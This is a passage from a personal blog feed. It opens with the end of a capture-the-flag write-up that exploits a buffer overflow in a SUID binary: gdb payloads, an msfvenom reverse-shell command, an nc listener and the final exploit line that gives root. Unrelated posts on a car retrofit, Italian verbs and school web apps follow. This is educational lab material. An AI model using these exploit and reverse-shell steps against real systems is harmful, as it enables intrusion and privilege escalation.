class="o">&lt;+</span><span class="mi">78</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="o">%</span><span class="n">eax</span> <span class="w"> </span><span class="mh">0x0000078a</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">79</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x4f0</span><span class="w"> </span><span class="o">&lt;</span><span class="n">outs</span><span class="nv">@plt</span><span class="o">&gt;</span> <span class="w"> </span><span class="mh">0x0000078f</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">84</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="err">$</span><span class="mh">0x10</span><span class="p">,</span><span class="o">%</span><span class="n">esp</span> <span class="w"> </span><span class="mh">0x00000792</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">87</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="err">$</span><span class="mh">0x0</span><span class="p">,</span><span class="o">%</span><span class="n">eax</span> <span class="w"> </span><span class="mh">0x00000797</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">92</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="o">-</span><span class="mh">0xc</span><span class="p">(</span><span class="o">%</span><span class="n">ebp</span><span class="p">),</span><span class="o">%</span><span class="n">esp</span> <span class="w"> </span><span class="mh">0x0000079a</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">95</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="o">%</span><span class="n">ecx</span> <span class="w"> </span><span class="mh">0x0000079b</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">96</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="o">%</span><span class="n">ebx</span> <span class="w"> </span><span class="mh">0x0000079c</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">97</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="o">%</span><span class="n">esi</span> <span class="w"> </span><span class="mh">0x0000079d</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">98</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="o">%</span><span class="n">ebp</span> <span class="w"> </span><span class="mh">0x0000079e</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">99</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="o">-</span><span class="mh">0x4</span><span class="p">(</span><span class="o">%</span><span class="n">ecx</span><span class="p">),</span><span class="o">%</span><span class="n">esp</span> <span class="w"> </span><span class="mh">0x000007a1</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">102</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">ret</span><span class="w"> </span> </code></pre></div> <p>The best breakpoint would be at <code>0x778</code> where it makes the call to the actual <code>leavemsg</code> function. We can run <code>break leavemsg</code> to break on the function name.</p> <p>Now We use this information to craft our actual testing payload:</p> <div class="highlight"><pre><span></span><code>(gdb) run $(python -c 'print "\x55" <span class="gs">* (2064 - 256 - 4) + "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" *</span> 4') </code></pre></div> <p>Once we hit enter, it will pretty immediately hit the breakpoint for our function. Now is the time to examine the memory.</p> <p>We can do so using <code>x/2000xb $esp+750</code>. The important part of this step is to find any chars that have been skipped and record them so <code>msfvenom</code> does not use them in its payload. </p> <p>Here is what I found:</p> <div class="highlight"><pre><span></span><code>\x00\x09\x0a\x20 </code></pre></div> <p>We can pass this in as a string for the option <code>--bad-chars</code> so <code>msfvenom</code> will avoid them:</p> <h1 id="generate-final-payload">Generate final payload</h1> <div class="highlight"><pre><span></span><code><span class="n">msfvenom</span><span class="w"> </span><span class="o">-</span><span class="n">p</span><span class="w"> </span><span class="n">linux</span><span class="o">/</span><span class="n">x86</span><span class="o">/</span><span class="n">shell_reverse_tcp</span><span class="w"> </span><span class="n">LHOST</span><span class="o">=</span><span class="mf">10.10</span><span class="o">.</span><span class="n">x</span><span class="o">.</span><span class="n">x</span><span class="w"> </span><span class="n">lport</span><span class="o">=</span><span class="mi">4444</span><span class="w"> </span><span class="o">--</span><span class="n">bad</span><span class="o">-</span><span class="n">chars</span><span class="o">=</span><span class="s2">"</span><span class="se">\x00\x09\x0a\x20</span><span class="s2">"</span><span class="w"> </span><span class="o">--</span><span class="n">platform</span><span class="w"> </span><span class="n">linux</span><span class="w"> </span><span class="o">--</span><span class="n">format</span><span class="w"> </span><span class="n">c</span> <span class="o">...</span> <span class="n">Payload</span><span class="w"> </span><span class="n">size</span><span class="p">:</span><span class="w"> </span><span class="mi">95</span><span class="w"> </span><span class="n">bytes</span> <span class="o">...</span> </code></pre></div> <p>Now we need to take the payload output and combine it into one big string.</p> <p>With our string, we need to do one last math problem for final buffer and NOPs size:</p> <div class="highlight"><pre><span></span><code> Buffer = "\x55" <span class="gs">* (2064 - 100 - 95 - 4) = 790</span> <span class="gs"> NOPs = "\x90" *</span> 100 Shellcode = "\xbd\x95\xf6...\x02\xce" #95 EIP = "\x66" * 4' </code></pre></div> <p>And use this in the <code>run $(python -c 'print ...')</code> command.</p> <h1 id="find-address-for-payload">Find address for payload</h1> <p>Our code will hit the breakpoint again. Now we need to find a line or two in the NOPs before our shellcode appears and use that memory address in the <code>eip</code>. Our shell code starts with <code>0x48 0x31 ...</code> and will be the first bytes after the sequence of `0x90` bytes.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/08/image-94.webp"/></p> <p>Our shellcode starts at <code>0xffffd73a</code>. I'm going to set the <code>eip</code> a bit earlier at <code>0xffffd72a</code>. This machine will need the bytes in little endian format, so the eip will be <code>"\x2a\xd7\xff\xff"</code>.</p> <h1 id="execute-final-payload">Execute final payload</h1> <p>We replace the <code>"\x66" * 4</code> in our run command with this new address. Finally let's boot a new terminal with <code>nc -lvnp 4444</code> so the connection can complete. This binary has root privileges with the suid set, so if we connect to it from <code>gdb</code>, it will run as the user gdb is running as. </p> <p>So instead of doing another <code>(gdb) run</code> command, <code>quit</code> gdb and in the main shell run:</p> <div class="highlight"><pre><span></span><code><span class="o">./</span><span class="n">leave_msg</span><span class="w"> </span><span class="o">$</span><span class="p">(</span><span class="n">python</span><span class="w"> </span><span class="o">-</span><span class="n">c</span><span class="w"> </span><span class="s1">'print "</span><span class="se">\x55</span><span class="s1">" * (2064 - 124 - 95 - 4) + "</span><span class="se">\x90</span><span class="s1">" * 124 + "&lt;payload&gt;" + "</span><span class="se">\x3a\xd7\xff\xff</span><span class="s1">"'</span><span class="p">)</span> </code></pre></div> <p>Our nc listener lights up, and <code>whoami</code> tells us we are root! Let's grab that flag int /root/flag.txt</p>2021-08-12T17:48:34-04:002021-08-12T17:48:34-04:00Eric Turnertag:blog.ericturner.it,2021-08-12:/2021/08/12/password-protection-for-htb-writeups/

<p>Multiple platforms, HackTheBox, TryHackMe, BlueTeamLabsOnline, express they do not want the answers/flags posted until the challenge is retired. Thus, for any active challenge on these platforms, the bulk of the content is password protected. </p> <p>For password-protected challenge write-ups: use the challenge flag as the password to the blog post …</p>

<p>Multiple platforms, HackTheBox, TryHackMe, BlueTeamLabsOnline, express they do not want the answers/flags posted until the challenge is retired. Thus, for any active challenge on these platforms, the bulk of the content is password protected. </p> <p>For password-protected challenge write-ups: use the challenge flag as the password to the blog post</p> <p>For password-protected machine write-ups:</p> <ul> <li>HackTheBox uses the root password hash or Admin password hash (early writeups may have used the system flag, however the platform implemented flag rotation and this does not work. It looks like as of 2024, challenges also have flag rotation so it will be tricky to properly password protect these with nothing to vet and unlock for users who have completed the task. You can still reach out to me for assistance on some of my writeups.</li> <li>BlueTeamLabs I have custom created passwords for them until they are retired so you would need to reach out for these to be unlocked.</li> </ul> <div class="highlight"><pre><span></span><code><span class="w"> </span>#<span class="w"> </span><span class="nv">linux</span><span class="w"> </span><span class="nv">example</span><span class="w"> </span><span class="nv">of</span><span class="w"> </span><span class="nv">password</span><span class="w"> </span><span class="nv">hash</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nv">HackTheBox</span> <span class="w"> </span><span class="nv">root</span>:<span class="mh">$6</span>$<span class="nv">vSJ</span>....<span class="nv">krWP0</span>:<span class="mi">18577</span>:<span class="mi">0</span>:<span class="mi">99999</span>:<span class="mi">7</span>::: <span class="w"> </span>#<span class="w"> </span><span class="nv">windows</span><span class="w"> </span><span class="nv">example</span><span class="w"> </span><span class="nv">of</span><span class="w"> </span><span class="nv">password</span><span class="w"> </span><span class="nv">hash</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nv">HackTheBox</span> <span class="w"> </span><span class="nv">Administrator</span>:<span class="mi">500</span>:<span class="nv">aad3b435</span>...<span class="mi">3</span><span class="nv">b435b51404ee</span>:<span class="nv">d1256c</span>...<span class="mi">5017</span>:::<span class="w"> </span> </code></pre></div> <p>You can find unlocked walkthroughs for retired challenges on any platform using the <a href="https://blog.ericturner.local/tag/unlocked-walkthrough/">#unlocked-walkthrough</a> tag.</p>2020-08-26T13:46:52-04:002020-08-26T13:46:52-04:00Eric Turnertag:blog.ericturner.it,2020-08-26:/2020/08/26/2018-mustang-technology-retrofit/

<p><img alt="" src="https://blog.ericturner.it/uploads/2020/08/IMG_7984.webp"/></p> <p>Before the retrofit, my original cluster with Sync 2 (MyFordTouch) system </p> <p>I know I bought my vehicle at a higher mileage (50k) but I have loved essentially every detail of it. However, I definitely liked the new technology in the 2018+ models including a new digital speedometer cluster and the …</p>

<p><img alt="" src="https://blog.ericturner.it/uploads/2020/08/IMG_7984.webp"/></p> <p>Before the retrofit, my original cluster with Sync 2 (MyFordTouch) system </p> <p>I know I bought my vehicle at a higher mileage (50k) but I have loved essentially every detail of it. However, I definitely liked the new technology in the 2018+ models including a new digital speedometer cluster and the Sync 3 system which supported Apple CarPlay. Turns out I was not alone. I stumbled across a <a href="https://www.mustang6g.com/forums/threads/2018-digital-cluster-installation-guide.99275/">forum post here</a> where someone had actually figured out how to port backwards the digital cluster! I already knew Sync 3 was compatible, as the 2016's had the upgrade whereas my 2015 did not.</p> <p>I ordered from Hellhorse Performance during the beginning of the Coronavirus shelter-in-place order back in March. I was itching to have something to do, and installation of a new cluster and sync 3 system sounded like a great project to keep me busy. A few weeks later, and the boxes arrived!</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2020/08/IMG_0996.webp"/></p> <p>All the pieces laid out!</p> <p>In total, I had to tear out the dash, and steering wheel column. 3 out of 4 of the buttons in the steering wheel needed replacement, the original cluster bezel needed replacement, and part of the dash pad behind the original cluster needed trimmed in order to make room for the increased depth of the new cluster.</p> <p><img alt="Cluster tear out" src="https://blog.ericturner.it/uploads/2020/08/IMG_1020.webp"/></p> <p>View of the tear-out</p> <p>Once all of the appropriate hardware pieces were installed, next came the programming. I decided to do the programming myself, which was also super easy due to the template the original poster attached. I went onto got my original As-Built Data from <a href="https://www.motorcraftservice.com/AsBuilt">Ford Motorcraft's site here</a>, and then copied it into a spreadsheet for safe keeping. I then had to go through the template and modify all the lines for the SCCM, IPC, and APIM systems in order to reflect the new buttons on the steering wheel, new information system (sync 3) and ensure my mileage matched up with my old odometer.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2020/08/IMG_1034.webp"/></p> <p>Finished view! 15 Apr 2020</p> <p>But it was definitely super rewarding to custom program the pieces and get everything to work. It feels like a brand new car on the interior!</p> <p>As of the time of writing, 26 Aug 2020, I also have a new tuner mounted to my windshield as well. Definitely a lot of new technology in the car now!</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2020/08/IMG_2176.webp"/></p> <p>Digital Cluster, Sync 3 w/ CarPlay &amp; my new tuner!</p>2019-12-20T14:22:08-05:002019-12-20T14:22:08-05:00Eric Turnertag:blog.ericturner.it,2019-12-20:/2019/12/20/italian-verb-tense-cheat-sheet/

<p><img alt="" src="https://blog.ericturner.it/uploads/2019/12/image.webp"/></p> <p>View of the verb tense sheet</p> <p>I have been using Busuu to learn Italian for the past few weeks (2020 new years resolution is to learn as much Italian as I can!). However all the varying verb tenses can be hard to keep up on. Here is a cheat sheet …</p>

<p><img alt="" src="https://blog.ericturner.it/uploads/2019/12/image.webp"/></p> <p>View of the verb tense sheet</p> <p>I have been using Busuu to learn Italian for the past few weeks (2020 new years resolution is to learn as much Italian as I can!). However all the varying verb tenses can be hard to keep up on. Here is a cheat sheet I made in Google Sheets that anyone else can feel free to copy or print out for their own use!</p> <p><a href="https://docs.google.com/spreadsheets/d/1QZ4JdB1t4SYbum2nlbAnkGfC2fG20yXEMgEzMUGNNeo/edit#gid=0"></a><a href="https://docs.google.com/spreadsheets/d/1QZ4JdB1t4SYbum2nlbAnkGfC2fG20yXEMgEzMUGNNeo/edit?usp=sharing">https://docs.google.com/spreadsheets/d/1QZ4JdB1t4SYbum2nlbAnkGfC2fG20yXEMgEzMUGNNeo/edit#gid=0</a></p>2019-03-05T17:01:56-05:002019-03-05T17:01:56-05:00Eric Turnertag:blog.ericturner.it,2019-03-05:/2019/03/05/end-of-year-device-check-in-app/

<p>Another application I built at work, during the month of February, that I am super proud of is a way for us to check in devices at our high school. Essentially, a teacher logs in and the application will automatically pull a list of the teacher's classes. Then the teacher …</p>

<p>Another application I built at work, during the month of February, that I am super proud of is a way for us to check in devices at our high school. Essentially, a teacher logs in and the application will automatically pull a list of the teacher's classes. Then the teacher selects a class and the application will grab all the enrolled students from our SIS and then use that list to communicate with our Asset Management software and return a list of all the devices assigned to those students in a beautiful array of cards! Just in case additional devices are found, teachers can add those at the top. In this testing page, I did not add all the icons that is in production, however you can see on the added devices that the icons are for collecting accessories such as case, protective shield and charger. It allows us to at a glance see if all the accessories were collected. Clicking on an asset pops up a modal to verify the correct student who is assigned is the one turning in the device, and capturing information on the accessories! All checked accessories' icons will change green based on what is selected in the form. Proud of how this one turned out as well!</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2019/03/Screenshot_2019-03-05-High-School-Checkin1-e1551806553232.webp"/></p> <p>View of the dynamically loaded assets for all enrolled students in a specific class!</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2019/03/Screenshot_2019-03-05-High-School-Checkin2.webp"/></p> <p>View of the modal to collect information about a specific device.</p>2019-03-05T16:50:41-05:002019-03-05T16:50:41-05:00Eric Turnertag:blog.ericturner.it,2019-03-05:/2019/03/05/prom-tickets-web-app/

<p>I work in a school district and one of my latest projects is to create a custom application for prom tickets. It features the ability to scan a student's ID and will verify the student against a list for eligibility and then automatically send out tickets to the students for …</p>

<p>I work in a school district and one of my latest projects is to create a custom application for prom tickets. It features the ability to scan a student's ID and will verify the student against a list for eligibility and then automatically send out tickets to the students for Prom all at once! Here are some screenshots of the app of the beginning process where it can check for eligibility. Also attached is a screenshot where the student would automatically get the tickets sent to their email! Proud of how it turned out! </p> <p><img alt="login screen" src="https://blog.ericturner.it/uploads/2019/03/Screenshot_2019-03-05-Prom-Login.webp"/></p> <p>Login Screen with Google SSO</p> <p><img alt="eligibility checking" src="https://blog.ericturner.it/uploads/2019/03/Screenshot_2019-03-05-Prom-Ticket-Manager.webp"/></p> <p>Eligibility Checking</p> <p><img alt="automated tickets emailed" src="https://blog.ericturner.it/uploads/2019/03/Screenshot_2019-03-05-Your-Prom-Tickets-eturner4-warren-k12-in-us-MSD-Warren-Township-Mail.webp"/></p> <p>Automatically sends students their tickets!</p>